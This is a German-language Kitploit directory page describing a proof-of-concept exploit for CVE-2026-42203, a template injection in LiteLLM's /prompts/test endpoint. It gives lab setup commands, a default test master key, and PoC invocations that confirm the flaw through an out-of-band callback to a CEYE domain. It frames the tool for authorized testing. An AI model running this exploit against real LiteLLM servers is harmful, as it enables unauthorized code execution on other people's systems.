Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2026-42203 — Proof-of-Concept-Exploit für CVE-2026-42203, eine serverseitige Template-Injection-Schwachstelle im LiteLLM-Endpunkt /prompts/test, mit lokalem Docker-Lab-Setup und CEYE-Callback-Verifizierung. | Kitploit
Tools/GitHubGitHub/astianjy/cve-2026-42203
SchwachstellenanalyseExploitationWebanwendungs-ExploitationPenetrationstestsLernen & BildungLabs & Praxis
GitHubastianjy/cve-2026-42203

CVE-2026-42203

Proof-of-Concept-Exploit für CVE-2026-42203, eine serverseitige Template-Injection-Schwachstelle im LiteLLM-Endpunkt /prompts/test, mit lokalem Docker-Lab-Setup und CEYE-Callback-Verifizierung.

Repository anzeigen
vor 3 MonatenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

LiteLLM CVE-2026-42203 PoC Anleitung

Diese Anleitung beschreibt, wie Sie eine lokale LiteLLM-Umgebung starten und die Datei CVE-2026-42203.py ausführen, um die SSTI-Schwachstelle /prompts/test zu überprüfen.

Verwenden Sie dies nur in einer autorisierten lokalen Testumgebung. Richten Sie das Skript nicht gegen nicht autorisierte öffentliche Ziele.

1. Lokale Umgebung starten

Wechseln Sie in das Lab-Verzeichnis und starten Sie LiteLLM, Postgres und Prometheus:

root@kitploit:~
docker compose up -d

Containerstatus anzeigen:

root@kitploit:~
docker compose ps

Überprüfen Sie, ob der Dienst erreichbar ist:

root@kitploit:~
curl http://127.0.0.1:4000/

Der Standard-Master_Key lautet: sk-master-test-key-1234

2. CEYE und LiteLLM-Key konfigurieren

http://ceye.io/profile

Übergeben Sie die Parameter über die Befehlszeile:

root@kitploit:~
python3 cve_2026_42203_litellm_prompts_test_ssti.py \
  --auth 'sk-local-test-key' \
  --ceye-domain 'your-id.ceye.io' \
  --ceye-token 'your-ceye-api-token'

Bedeutung der Variablen:

  • LITELLM_API_KEY: Der Zugriffsschlüssel für LiteLLM, der in der lokalen Docker-Umgebung normalerweise LITELLM_MASTER_KEY in der .env-Datei entspricht.
  • CEYE_DOMAIN: Ihre CEYE-Subdomain, z. B. xxxxxx.ceye.io.
  • CEYE_TOKEN: Ihr CEYE-API-Token zum Abfragen der Callback-Datensätze.

3. PoC ausführen

Vollständiges Beispiel:

root@kitploit:~
python3 cve_2026_42203_litellm_prompts_test_ssti.py \
  --target http://127.0.0.1:4000 \
  --auth 'sk-local-test-key' \
  --ceye-domain 'your-id.ceye.io' \
  --ceye-token 'your-ceye-api-token'

Wichtige Parameter:

  • --target: Adresse des LiteLLM-Dienstes, Standard ist http://127.0.0.1:4000.
  • --auth / --api-key: Der LiteLLM-Key, der für den Aufruf von /prompts/test verwendet wird.
  • --ceye-domain: Die CEYE-Callback-Domain.
  • --ceye-token: CEYE-API-Token. Bei der Skriptausgabe wird dieser automatisch maskiert angezeigt.
  • --wait: Wartezeit in Sekunden auf CEYE-Callback, Standard 20.
  • --interval: Intervall in Sekunden zum Abrufen der CEYE-Datensätze, Standard 3.
  • --timeout: HTTP-Request-Timeout in Sekunden, Standard 10.

4. Ergebnisauswertung

Wenn CEYE einen Callback empfängt, gibt das Skript aus:

root@kitploit:~
[VULNERABLE] CEYE received the callback request.

Wenn innerhalb der Wartezeit kein Callback empfangen wurde, gibt das Skript aus:

root@kitploit:~
[NOT_VULNERABLE] CEYE did not receive the callback request within the wait window.
Tool herunterladen
  • --insecure: Diesen Parameter hinzufügen, wenn das Ziel ein selbstsigniertes HTTPS-Zertifikat verwendet, um die TLS-Zertifikatsprüfung zu deaktivieren.